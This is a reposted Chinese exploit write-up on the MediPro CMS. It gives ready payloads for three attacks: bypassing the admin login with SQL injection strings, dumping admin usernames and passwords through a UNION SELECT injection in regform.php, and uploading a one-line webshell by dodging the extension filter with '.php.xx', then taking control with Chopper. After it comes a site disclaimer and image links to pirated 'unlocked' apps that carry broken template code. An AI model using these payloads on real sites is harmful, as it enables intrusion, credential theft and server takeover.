MediPro 有多套cms网站存在过滤不严,存在注入漏洞,后台可以绕开登录,get shell,获取服务器权限。
/* 呃,官网默认是zend加密的代码,需要解密。*/
百度了下,,还是很多网站使用。。
1、后台绕开登录漏洞
在服务器没有开magic_quotes_gpc的情况下,直接登录系统。后台一般是www.xxxx.com/adm/
用户名:webmaster' or 1=1 or 'a'='a /*
密码:随便输入,验证码输入后就能直接进去了
另外:,magic_quotes_gpc转义后,老衲尝试用了%d5%27这样的方法,如:
用户名user=admin%d5%27 or 1=1 limit 0,1 -- 这类的
虽然也绕开了admincheck()函数,但后面setcookies的时候,直接沿用了用户上传的user的值,结果在后面验证权限的时候过不了,没有继续搞下去了。
2、注册页面的注入漏洞
在注册用户的地方regform.php?membertypeid=10,就有注入漏洞,问题代码出现在注册页:regform.php,其中$membertypeid没有过滤好,后面的函数直接使用了$membertypeid。
没有开启转义时:
http://网站/regform.php?membertypeid=10 WHERE 1=2 UNION SELECT 1,`password`,"user",1,0,0,`user`,1,0 from cms_admin t limit 0,1 --
如果开启了magic_quotes_gpc,"user" 的 双引号被转义,也有个比较猥琐的方法:
大体方法是:再union一下cms_member_regform_10表,把formcolname字段(注:这个字段就是注册项字段)里面的值显示出来即可。 必须要这个,因为注册页面的项是动态生成的,否则显示不出管理员的帐号密码。
具体见后面的证明图吧。
3、后台get shell
比较多,简单的利用如在/adm/temp.inc.php中,代码只过滤了上传文件的后缀“.php”“.exe”这样的内容,,就可以用“.php.xx”,如果是用windows的IIS,还可以把后缀改成.asp,.asa等;
if ( substr( $fname, 0 - 4 ) == ".php" || substr( $fname, 0 - 4 ) == ".exe" )
{
err( $strDownNotice11, "", "" );
}
登录后台后,直接 访问www.xxxxx.com/adm/tempftp.php?fold=default
上传一个一句话:4.php.xx
上传后的路径:www.xxxxx.com/templates/default/4.php.xx
菜刀开路~~
注:测试用的4.php.xx已经删除。
版权与免责声明:
凡注明稿件来源的内容均为转载稿或由网友用户注册发布,本网转载出于传递更多信息的目的;如转载稿涉及版权问题,请作者联系我们,同时对于用户评论等信息,本网并不意味着赞同其观点或证实其内容的真实性;
![英雄棋士团(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/yingxiongqishituanyuxiazai.jpg)
![美食小当家?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/meishixiaodangjia.png)
![2047?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/2047.jpg)
![荣誉指挥官(预下载)?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/rongyuzhihuiguanyuxiazai.png)
![繁荣美食市场物语?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/shouyoupic/fanrongmeishishichangwuyu.jpg)
![夸克浏览器 v4.2.1.138 好用的手机浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/kuakezuolanqi.jpg)
![移动办公软件 OfficeSuite Premium v10.18.28716 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/yidongbangongruanjian.jpg)
![乐秀视频编辑器 VideoShow v8.8.4 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/lexiushipinbianjiqi.png)
![X 浏览器 v3.3.9 一款小巧的安卓浏览器?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/x.jpg)
![安卓密码管理软件 Enpass v6.4.5.368 内购解锁版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/appimg/202007/anzhuomimaguanliruanjian.jpg)
![差分复制同步 FastCopy-M v3.6.3.51 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/FastCopy3.png)
![多标签页拓展 Clover v3.5.2 Build 19809 精简绿色版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Clover.png)
![文件重命名 Advanced Renamer v3.85 Lite 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/Advanced_Renamer.png)
![网络防火监控 GlassWire Elite v2.1.166 绿色便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/GlassWire.png)
![影音播放器 Daum Potplayer v1.7.20538 美化便携版?=$bqr['banben']?>](http://shouyouimg.cnzzla.com/d/file/softimg/PotPlayer.png)
